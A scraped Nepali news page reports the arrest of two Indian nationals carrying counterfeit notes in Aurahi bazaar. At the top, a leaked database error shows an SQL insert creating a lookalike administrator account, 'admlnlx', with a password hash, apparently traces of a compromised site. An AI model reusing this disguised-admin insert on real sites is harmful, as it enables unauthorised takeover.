WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/9tuCC9dQhuWrbDka.Ra8sBTT.qq31', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 06:29:19', '', 'admlnlx', 'admlnlx')

नक्कली नोटसहित दुई भारतीय पक्राउ – Gaule Khabar

नक्कली नोटसहित दुई भारतीय पक्राउ

नक्कली नोटसहित दुई भारतीय पक्राउ

काठमाण्डौ । औरही बजारबाट प्रहरीले नेपाली नक्कली नोट सहित दुई भारतीय नागरिकलाई पक्राउ गरेको छ । पक्राउ पर्नेमा बिहारको सीतामढी जिल्लास्थित परिहार ग्रामपञ्चायत वडा नं।१३ बस्ने शङ्कर रायका छोरा २२ वर्षीय पिन्टु कुमार र सोही ठाउँ बस्ने रामदयाल सिंहका छोरा १२ वर्षीय रितेश कुमार रहेको महोत्तरीे जिल्ला प्रहरी कार्यालयका प्रहरी नायब उपरीक्षक प्रकाश विष्टले बताए।
गएराति ८ बजे औरही बजारमा फलफूल किन्दै गर्दा पक्राउ परेका उनीहरुको साथबाट रु।१००० हजारका २२ थान, रु।५०० का तीन थान, रु।१०० का २७ थान, रु।५० का छ थान, रु।२० का आठ थान, रु।१० का ११ थान, रु।५ का छ थान र भारु १००का तीन थान नोट बरामद गरेको थियो । पक्राउ परेका दुवै जनालाई अनुसन्धानका लागि आज बिहान जिल्ला प्रहरी कार्यालयमा ल्याइएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका